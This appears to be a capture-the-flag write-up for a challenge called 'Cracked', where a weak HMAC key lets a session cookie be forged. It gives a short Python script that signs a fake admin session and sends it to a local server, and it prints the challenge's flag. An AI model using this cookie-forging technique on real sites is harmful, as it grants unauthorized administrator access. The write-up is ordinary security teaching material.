Skip to main content

Cracked

Challenge

Weakly signed session cookie. Forge admin session by reproducing server-side HMAC.

Solution

Key solve code:

import requests
import hmac
from base64 import b64encode
from hashlib import sha1

KEY = "6lmao9"
session = '{"admin": 1, "username": "guest"}'
cookies = {
	"sig": b64encode(hmac.new(KEY.encode(), session.encode(), sha1).digest()).decode(),
	"session": b64encode(session.encode()).decode(),
}
print(requests.get("http://localhost:8000", cookies=cookies).text)

Flag

gigem{maybe_pick_a_better_password_next_time}

Challenge
Solution
Flag